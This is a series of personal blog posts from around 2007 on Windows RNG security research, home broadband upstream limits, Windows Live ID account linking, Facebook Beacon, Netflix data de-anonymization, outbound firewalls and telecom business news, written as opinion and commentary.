Windows randomness– sky is not falling yet

A recent paper at CCS reported problems in the Windows 2000 random-number generator. The story made it to Slashdot and later amplified in the blogosphere, after MSFT confirmed that the same problem applied to XP. One lone voice of reason on Slashdot tried to clear the air in vain, while speculation continued on whether the entire edifice of Windows cryptography had been undermined. MSFT itself did not help the case by taking issue with the definition of “vulnerability” but still announcing a change to the functionality in XP SP3

This blogger’s two cents worth of observations on the subject:

  • Most glaring problem with the paper is an unrealistic threat-model. The attack requires complete access to the internal state of the random-number generator. In a typical setting the adversary can observe the output of a PRNG but not peek inside the black-box to see what is going on. As such this work is closer in spirit to the side-channel attacks against OpenSSL or x86 shared-cache problem. These have the prerequisite that the adversary has additional visibility into the operation of the system.
  • In this case the authors assumed a very powerful adversary, one who has exploited a remote-code execution vulnerability to gain complete control of the application. (“Buffer overrun” is used as proxy for this in the paper, although fewer of these vulnerabilities are exploitable for code execution owing to proliferation of compiler and OS features.) The problem is, once attacker is running code on the system with the privileges of the application using the PRNG, they have complete control and have many options. There may be no reason to attack PRNG at this point: she can directly read any keys lying around in memory, access plain-text encrypted/decrypted in those keys etc. This is equivalent to the observation that once you can break into a house, the fact that the owner did not shred all the documents may be quite irrelevant if the same information in those documents can be obtained elsewhere in the residence.
  • Once the internal state of a PRNG is known, predicting future is trivial until it is rekeyed or supplied with entropy from a pool. No PRNG is secure against this problem. So the incremental risk presented by the attack applies to the following scenario only: a system is 0wned after it has generated, used and discarded key material using the PRNG but before the PRNG state has been reinitialized. In this case the PRNG state allows recovering the key that otherwise would not have been reachable. (“forward security” assumption.) Any earlier and the attack is irrelevant because the keys generated with the PRNG are still around in memory and can be read directly, without having to rewind PRNG state. Any later and PRNG state is lost irreversibly. That’s a narrow window of opportunity for carrying out this attack, on top of successfully exploiting a remote code execution vulnerability.
  • A similar lack of perspective around system security continues into the discussion of isolation boundaries. There is an extended discussion on the benefits of kernel vs user-mode as if that were a meaningful security boundary. Code running as administrator can easily obtain kernel privileges trivially in all versions of Windows prior to Vista (by programmatically loading a device driver) and read same PRNG state from the kernel. Similarly the PRNG can run in user mode but in a different process like lsass– which is also how key isolation works in Vista for private keys. In fact the user/kernel mode distinction does not even hold in Linux: root can directly read kernel memory.
  • For this reason, having separate processes each running their own PRNG can be good for security contrary to the argument in the paper. Compromising the state from one does not allow getting information for any other process. For example exploiting a buffer overrun in IIS service does not reveal information about PRNG state of the process that handles SSL negotiation– which is surprisingly not IIS. This is consistent with the isolaton between accounts provided by the OS.
  • There is an estimate of 600 SSL handshakes required for refreshing client state and cavalier assertion to the effect that this number is unlikely to be reached in practice. In fact: for SSL servers under load (the highest-risk case) 600 connections are  easily cycled within a matter of minutes. As for clients a quick peek at SSL usage on the web would show that most large services do not use SSL-session resumption– because servers are load balanced and client could end up going to any one of hundreds of identical servers . So even logging into email once over SSL involves dozens of SSL re-handshakes from scratch, one for every object accessed (including images and other non-essential data embedded on the page) each exercising the PRNG.
  • The authors reverse engineered W2K code and yet keep referring it to as “world’s most popular RNG” even after citing the statistic that its market share is in single-digits percent. Due diligence would have suggested looking at XP, 2003 Server and Vista first before making these claims. Vista in particular has two completely independent cryptography implementations: CAPI which has existed since the earliest versions of NT, and Crypto Next Generation or CNG, new in Vista. Not only do they not share code for underlying primitives but even the respectives interfaces are incompatible. In the end W2K3 and Vista proved to be not vulnerable.

Bottom line: rumors of the complete breakdown of CAPI may have been slightly exaggerated.

cemp

Bandwidth asymmetry in US broadband (2/2)

Here is a recap of the challenges associated with remotely accessing computers at home behind a typical broadband connection:

  1. The operating system. Most common versions of Windows have few built-in features to act as a server. Remote desktop is the only one that works out of the box. Even that is of limited value because of the licensing stipulations: a remote user will log out the interactive one for XP Professional and all Vista editions. Only the server SKUs, rarely found installed on end-user machines support concurrent logon sessions. Even the one remote connection you can forget about with XP Home edition, where 3rd party VNC solutions are the only way to access the machine remotely. IIS is available as an optional add-on for most SKUs. Linux and Mac OS-X are better in this respect out-of-the-box since they are traditionally used for both client and server roles. But none of the solutions amount to an easy-to-use, secure remote access/sharing solution for novice users.
  2. Firewall interference. Not only does the OS lack server-side applications, it gets in the way of others with the default firewall configuration. The personal firewall is an  important security feature introduced in Windows XP and significantly strengthened in XP SP2. Its  deployment coincided with the rise of botnets, when reports were circulating that a Windows machine attached to an always-on broadband connection will be 0wned in a matter of minutes. This reality informed the decision to block most inbound ports. (Fortunately applications adjusted– after installation they silently opened the ports necessary by changing firewall settings, a trick that stopped working when Vista introduced the largely inane UAC feature.)
  3. Home networking configuration. The standard configuration for most home networks involves a wireless router in the mix, behind another cable/DSL modem. This means that the PCs are not directly exposed to the internet egress. Good for security, more hoops to jump through for using the system remotely. Routers typically have built-in web UI which can be used for setting up port forwarding. On the fighting chance that users managed to get past first two hurdles, this is where they could stumble. The number of routers that support UPnP may be an encouraging sign here as that protocol can be used to dynamically open-up external facing ports.
  4. ISPs. Finally the biggest obstacles are the internet service providers themselves. For all the advances in infrastructure, upstream bandwidth remains a scarce commodity. For example, here in Manhattan the standard Time-Warner package provides 10Mbps downstream and 512kbps upstream. That’s a factor of 20x. In the  most “equitable” scenario, our previous provider in Central Florida offered 9Mbps down/1.5Mbps up. On top of the constrained bandwidth, there is port-blocking, often couched in the language of security intended to confuse users. For example blocking port 25 has certainly helped stem the tide of spam originating from zombies. But it also prevented users from hosting their own email server at home. Similarly inbound port 80 is often blocked to preempt web-servers operating out of the basement– at least not without shelling out for the “business class subscription” from the ISP.

The result of these policies has been the imposition of a dual-standard on broadband subscribers. They are expected to consume content originating elsewhere. Copious amounts of bandwidth is available for this and ISPs are falling over trying to provide exclusive content in an attempt to move up the value chain. But customers are also discouraged from participating in the distribution of content, even accessing their own resources remotely.

cemp

Windows Live ID ships identity-linking

It is great to see that the Windows Live ID service went live with the “linked identities” feature recently. (Full disclosure: this blogger worked on the security review for the design.) Linked IDs were introduced to deal with the problem of juggling multiple identities. It’s well known that due to the lack of interoperability between web service providers, users end up registering for multiple accounts, one for Google,  one for Yahoo, one for MSN/Windows Live etc. This is a necessity because services available to one ID such as instant messaging a particular group of friends, are not available to others. Recent steps towards limited interoperability are encouraging and may decrease the need for that proliferation long term.

But less frequently acknowledged is the notion of personas, when users create multiple identities with the same Internet service provider. In this case the issue is not missing functionality or fragment networks, but the desire to maintain separation between aspects of one’s online activities.  theodoregeisel@hotmail.com may have exactly the same capabilities as drseuss@hotmail.com  but the user in this case presumably made a conscious decision to keep them distinct. Perhaps  they may even want to discourage contacts from discovering the correlation between the two. Less contrived examples are keeping different accounts for personal and work use, or interacting with casual acquaintances verses expressing an alter-ego in the presence of good friends.

The challenge for these users is managing the multiple accounts. Typically web authentication systems have the notion of a single identity that can be expressed at once. This is often mistakenly ascribed to a limitation of web browsers, namely the existence of a single global “cookie jar” where the cookies that correspond to authentication state are kept– not true, as evidenced by linking feature and for that matter Google being able to sustain both an enterprise ID and user ID at the same time. That leaves the user constantly logging in and out of accounts in order to manage both. Aside from being frustrating, this breaks  convenience features built into the authentication system which generally assumes a single account.  For example, the various implementations of “keep me signed-in” / “remember me” works for only one account. Logging out of that account and signing in with another clears the saved credential. (Actually it is more complicated: technically the passwords can be remembered by client-side extensions including the web-browser and these are generally capable of remembering multiple credentials. Smart-clients  are not limited to the one user rule, and even for web scenarios there is an exception with Windows Live ID login for Internet Explorer when the helper ActiveX control and BHO is installed.)

Linked identities provide an effective solution to this problem. The user proves ownership of both identities by entering the password for both on the same page on the Account page. This creates a permanent association between two identities. From that point on when the user is logged in as one account, they can quickly switch to the other by using a menu on the upper-right corner of the shared banner that appears across the top for most Live services. No logout, no  additional credential prompts. Linking operation is symmetric, more than one account can be linked and the links can be revoked by the user anytime in the future. The feature can be experienced first-hand at the Hotmail website by all existing users. Congratulations to the team on this milestone.

cemp

Bandwidth asymmetry in the US broadband market (1/2)

Back in the 1990s pundits speaking of the “information super-highway” liked to contrast its interactive nature with TV, emphasizing how much better of we were going to be because the new medium works two ways. TV was old-school, making us passive recipients of content expressive powers limited to choosing one pre-packaged experienced over the other. On the Internet everybody was going to be a participant, creating content.

The prediction proved correct to some extent, as evidence by the popularity of user-supplied content in Web 2.0 whether it takes the form of rambling blogs, blurry photographs names DSC001 on Flickr and more recently the fifteen-minutes-of-fame video on YouTube. But in this world contributing to the proliferation of content noise out there still requires help from another well-financed entity: the blogging site, photo-sharing website etc.

For the most part users are not running their own servers at home.  There is technology available for this, often open-source/free and to varying degrees usable by novice end-users. But there are good reasons for using a professional hosting service: it benefits from economy of scales, ease of management and gives users a host of features– including 24/7 reliability, backups etc.– that would be difficult to implement at home. For one-to-many sharing where the user is publishing “public” content intended for large number of people to access, it makes sense to upload it to a central distribution point. For private content, it is not as clear-cut. If  your tax returns are stored on a home PC and the goal is to work on them from a different location, a direct connection to the machine would be the straight-forward solution. The popular GoToMyPC app is one of the commercial solutions that has emerged in response to the demand. In principle the file access scenario has an equivalent hosted solution, where you can upload your files to a service in the cloud such as Windows Live Drive. But it’s easy to craft scenarios where that is not true: if the home PC had an expensive application such as PhotoShop installed locally, the only way to use that software is remote-access. Similarly the disruptive technology in SlingBox which streams cable/TV/DVR content over the Internet requires direct connectivity, in this case to the appliance and using it as server hosted at home. Last year Maxtor debuted the Fusion, a new external drive with networking support and built-in capability for sharing files over the Internet using links in email messages.

This is where the triad of OS developers, networking equipment vendors and ISP business models conspire to make life very difficult for consumers.

(continued)

cemp

Real-estate agents: deceptive practices even in strong markets

Combine two ingredients:

1. Real estate business is not exactly known for transparency and integrity. In spite of strict regulations– such as legal obligations to disclose known defects and record all transactions in public records– deceptive advertising, distorted perception and Ponzi-scheme mentality remain the hallmarks of the industry. (Some of the subtle ways where an agent works against the interests of the client, pressuring sellers to bid higher and buyers to accept lower bids, was chronicled in Freakonomics.)

2. New York metropolitan area real-estate remains one of the few islands of stability and uninterrupted irrational exuberance in the midst of a sobering, country-wide correction after the unsustainable bubble in housing prices for a whole decade. Manhattan remains strictly a
seller’s market including in rentals.

It’s no surprise that brokers resort to questionable practices trying to move units. This also explains why Craigslist, that venerable free resource, has been rendered completely useless for Manhattan, flooded by hundreds of bogus listings for non-existent apartments meant for bait-and-switch scams and otherwise useless, content-free classifieds describing IN ALL CAPS why this apartment will not be on the market very long. Goes to prove that sometimes “free” is not a good thing: charging people to place ads would go a long way to assure quality control and improve signal/noise ratio.)

Consider the following blurb from a contract that must be signed before brokers are willing to show apartments:

“You understand that the commission charged by [brokerage firm] for the aforesaid services is 15% percent of the first year’s rent … payable to [firm] only if you rent in a building or complex shown to you by [firm] within 120 days of such showing.”

This contains an ambiguous case: broker Bob shows unit #123 in the building which does not work. Later broker Alice from a different firm shows apartment #456 which the customer decides to take. Is Bob owed any commission? From reading the above blurb, the answer seems to be in the affirmative. In this case “Bob” continued to insist that was not the case. In fact it is  very much in the interest of the brokerage firm to have this over-reaching clause. It’s perfectly fair game to insist that a customer utilizing the services of an agent should properly compensate the firm. On the other hand by extending the claim to include all units and effectively “tainting” the building for for months, the company achieves lock-in effect. But Bob would also insist this is not an exclusivity agreement which is strictly speaking correct. It does not rule out working with another broker only creates strong economic incentives against doing that for the same building.

The pragmatic solution which worked in this case: different brokers for each neighborhood. This makes sense anyway because real-estate remains a very old-fashioned business personal connections matter and it’s unlikely that the same person has developed strong networks in all areas.

cemp

Crossing the line on privacy: Facebook story

It was a case of conventional wisdom at odds with itself.

Information security community has long maintained a very glib outlook on privacy. On the one hand embracing such enablers or paranoia as Tor, offshore data-havens and untraceable ecash, on the other hand griping about the indifference and cavalier attitude that most users  have towards  their own personal information. The failure of privacy-enhancing technologies to break into the mainstream has a consistent history from PGP to the failure of Zero Knowledge Networks to commercialize its network.

At the same time Facebook was the new poster-child for web 2.0 applications, the social network threatening to take over MySpace, flush with cash after having recently inked a lucrative advertising deal with MSFT after sitting in the middle of a bidding war against Google. It could do no wrong, and certainly not in such a trivial area as privacy. Scalability, performance, features– this is what makes or breaks social networks, as Friendster found out the hard way.

It turned out users did care about privacy after all. Long before a popular outcry from users, critics such as Cory Doctorow were writing blistering reviews of the Facebook
business model, referring to its view of users as “bait for the real customers, advertising networks.” In this case it did not take very long for popular sentiment to catch up. The Beacon feature crossed the line from dubious monetization strategy into outright abuse of customer data. At its core Beacon was a data linking scheme: Facebook partnered with several prominent ecommerce merchants including Amazon, Blockbuster and Fandango to access the transaction history of users at these external sites. This data stream which included purchase history was incorporated into a user feed, visible to other users. (A challenge considering that there is no shared identity spanning these sites– email address would have been the only link, which is good enough for advertising purposes.) In effect every time the user bought anything at one of these merchants, they became an unwitting walking billboard, advertising to other users what they purchased and the merchant.

Great value proposition for merchants on the face of it: through a process of viral marketing,  friends can be inspired to click on the link and visit the same merchant to purchase identical item, in a case of keeping-up-with-Johns played out on a social network. Meanwhile those users particularly drawn to cataloging their material possessions online would have the data stream automatically generated. At least that must have been the elevator pitch in some PowerPoint presentation that inspired this scheme.  One minor detail: viral marketing depends on willing participants who are impressed with the product and voluntarily rave about it to their contacts. Creating the appearance that users are implicitly endorsing everything they have bought is a non-starter, and forcing the endorsement to be carried out in a very public way demonstrated complete disregard for privacy.

A group of users 50K strong petitioned, more bad PR followed and eventually Facebook changed the feature to opt-in from opt-out. This is a very unusual and perhaps encouraging demand for privacy. Even in the original flawed design users had the option to disable the involuntary enrollment into the advertising program but they were sticking to the principle that meaningful consent must exist before people unwittingly become part of a dubious business plan with no clear value proposition for them. The storm is not over yet: a CNET article reports that EFF and CDT are planning on filing complaints with the FTC. Meanwhile Fortune/CNN is running a piece arguing that mismanaged PR and disregard for privacy is seriously damaging the company’s future prospects.  Next up: damage-control time.

cemp

Netflix prize data and the meaning of anonymity

Last week a paper from University of Texas titled How to break anonymity of the Netflix data-set was Slashdotted. In the ensuing discussion parallels were drawn to the release of AOL search data and asking whether this would finally put the kabash on any future release of user data for research purposes. The results are very interesting but do not quite point to such a drastic conclusion. In particular the notion of “anonymity” used in this paper, satisfactory from a mathematical point of view, is not consistent with the operable definition most users operate under.

To recap: In 2006 Netflix announced a one-million dollar prize to improve its recommendation service. The problem is deceptively simple to state: given past movie-ratings from a user, suggest other movies he/she will enjoy. This is a standard collaborative-filtering and machine learning problem. The solutions depend on access to massive amounts of training data. More data allows the algorithms to better understand user-data at very nuanced level and improve its predictions. Netflix was up to the challenge, releasing a very large data-set containing 100 million ratings from half-million users– almost one out of eight customer at the time. This data-set was “anonymized” according to the Netflix definition. Customers were identified by numbers only, no names, no personally-identifiable information or even demographic data– such as age, gender, education etc. which may actually have been useful for predictions.

On the surface, the new paper shows that in fact user can be identified from this stripped down data– this is the interpretation which fueled the Slashdot speculation. Reality is more complex: the main quantitative result from the paper is that movie-ratings for an individual are highly unique. No two people have similar ratings. (The data-set is “sparse” to use the proper language.) In fact they are so unique that there is unlikely to be two people who agree on their ratings for even a handful of movies. This effect is even more pronounced when the movies are more obscure– knowing that a user watched an obscure Ingmar Bergman movie sets them apart from the crowd.

Looked another way: suppose there is a large source of movie ratings, as in the Netflix prize data-set. If the goal is to locate a particular user whose identity has been masked, getting hold of just a few of their ratings from another source will be enough. Even among millions of users, there is unlikely to be a second person with the exact same tastes. In some ways this is intuitive but the important contribution of the paper is quantifying the effect and calculating exactly how much data is required for unique identification with high confidence. Answer: less than a dozen movie ratings, less if the movies are obscure or the dates the user watched the movie is also available– indirectly this is in the Netflix data set as the data the user provided a rating.

“From another source” is the critical caveat above. In the paper this is referred to as the auxilary data source. What the paper demonstrates is that the Netflix data set can be linked to another data-set. Linking can be a serious privacy problem: it allows aggregating information from different databases. If a database existed where personally identifiable information was stored along with a small number of movie ratings, that record could be matched against the Netflix data. That is the catch: there is no such database. As the auxiliary for mounting the attack, the paper uses Internet Movie Database or IMDB, where users volunteer movie reviews. That allows correlating the data on IMDB for that user with all the other ratings from Netflix.  As for the typical user profile on IMDB, the registration page asks for email address, gender,  year of birth, zipcode and country– all of them volunteered by the user and subject to no validation. This is the “90210” phenomenon: any time data is mandatory without good reason and no  way to enforce accuracy, the service provider ends up with many people named “John Smith” living in Hollywood, zip-code 90210, CA. That means the effect of linking IMDB and Netflix data is to discover that user nicknamed Mickey Mouse is a fan of Disney movies. Unless the user volunteered any more data to IMDB, the correlation does not get us any closer to that subscriber’s identity offline. All of the arguments about inferring sensitive information from movie ratings still hold (for example political affiliation based on their responses to a controversial documentary) but the data is now associated with user “MickeyMouse” instead of user #1234 in the original source. A step closer to identification? Perhaps. Fully identified? Not even close.

By itself the Netflix data set is not dangerous. That is a sharp contrast from the earlier AOL search data disaster: search history is sufficient, on its own to uniquely identify users because individuals enter private information into search queries such as their legal name or address. More important there is no limit to what search logs can contain: queries for health-conditions could be used to infer medical data, search for news may suggest professional interests etc.

cemp

Buffalo Technology is latest target of IP litigation

Visitors looking for wireless products on the Buffalo Tech. website will instead see this message:

Regrettably, the Court of Appeals has decided not to stay the injunction in the CSIRO v. Buffalo et al litigation during the appeal period. Although Buffalo is confident that the final decision in the appeal will be favorable and that the injunction will be lifted, Buffalo is presently unable to supply wireless LAN equipment compliant with IEEE 802.11a and 802.11g standards in the United States until that decision is issued.

Fortunately this does not impact customers who already bought devices. Manuals and firmware updates are still available even for the verboten product lines. Interesting enough the injunction only covers A and G devices so a pure draft-N router would still qualify in principle. But since all the draft-N routers also have A/B/G support for backwards compatibility, this stops Buffalo from shipping any wireless product for all intents and purposes. It’s not clear what the impact on the company will be. They have a diversified line of products including external drives, network-attached storage and even multimedia but the current litigation might even affect some of those devices such as wireless print servers.

cemp

Security theater, act#48: outbound blocking firewalls for PCs

Users running XP SP2, Vista or even a third-party firewall client such as ZoneAlarm have probably seen this warning: “… such and such program attempted to make a connection to the Internet and was blocked.” This is supposed to create a warm-and-fuzzy feeling for users. Here is messaging indicating that some shady application running on your computer attempted to do something sketchy, but the clever security system caught it and prevented harm. The reality is a bit different.

First to be clear: firewalls are very important for defense-in-depth. (Although there are alternative security paradigms such as the Jericho forum that seeks to dispense with them altogether.) Main function of a firewall is to block inbound connections, in other words stop other computers “out there” in the wild-wild web from attempting to access resources on the machine “here.” The firewall used this way is the first line of defense; even when the access attempt seems harmless– “surely it would be denied!”– there is no reason to take risks. Exploitable bugs in the access-control software have caused machines to be compromised simply by connecting to them. The further upstream one can detect and

But outbound blocking is an altogether different function. In this case, there is some software already running inside the trusted boundary, admitted into the inner sanctum. The firewall in this case prevents that code from communicating with the outside world. What purpose does that serve? With the exception of parental controls– which is rarely the intended effect– the answer is “not much.” The reason is that blocking assumes malicious intent on the part of the application. Perhaps it is trying to connect to some nefarious host out there and do something dubious, such as ship private user documents off to Russia or download more malware.  The problem is once malicious code is running with the same privilege as user, it is very hard to cut off all of the communication channels to the outside world for one basic reasons: processes and applications do not have strong identity.

While the host-based firewall attempts to create the illusion that application X is highly-regarded and application Y is not to be trusted  with talking to the outside world, in reality it has a very hard time sorting out between them. This is because applications are not intended to be an isolation boundary in an operating system. They are not protected against each other. Simple example: if Y is not allowed to open outbound connection, it can often launch a copy of X to do the same thing instead or prior to Vista subvert the internal workings of X. For “X” substitute Internet Explorer– launching a URL is sending information to a website. In fact malware authors already implemented a more reliable form of this strategy: when they need to phone home, for say downloading a new copy of the botnet software, they use the Background Intelligent Transfer System (BITS) as documented by Symantec. BITS is a trusted operating-system component and has no problem by-passing the firewall, even when acting under orders from malware. There was a minor stir around this when news initially surfaced, including articles at the Register and BBC.  In fact it should have been greeted with a yawn were it not for the firewall itself setting unrealistic expectations around what can be accomplished in the way of outbound blocking.

cemp

Verizon changes the tune

The tune around open-access, that is.
After suing the FCC around the spectrum-auction rules, the wireless carrier decided to reverse itself and embrace an open network. This is an unusual move, because until now telcos have jealously guarded access to their channels. Not content to passive data pipes over which other people build higher-margin services, they have been trying hard to move upstream in the value chain. Keeping tight control over the devices that can connect to the network is one way to fend off any potential competitors in this already difficult uphill battle.

Verizon points to the innovation that will result from lower barriers to entry and this story makes for very good PR on paper. Not that the business side will necessarily suffer from this act of altruism– if the vision is realized, the new devices and services will drive more customers who will still be paying Verizon $$$ for air-time. In that sense the only downside is loss of incidental revenue from sales of phones and other equipment. But considering these were heavily subsidized to start with, the only collateral damage may be the close relationship with Motorola, Nokia, LG and other manufacturers who will lose their lock-in effect on Verizon customers.

That said, until other telcos allow their customers to use existing devices with a competing network– something they have no incentive for and unlike Europe, no legal obligation to provide by unlocking phones– this is still one-hand clapping. Any increased customer choice will have to come from new devices yet to be designed, not the potential to use an existing device from another provider with the network.
cemp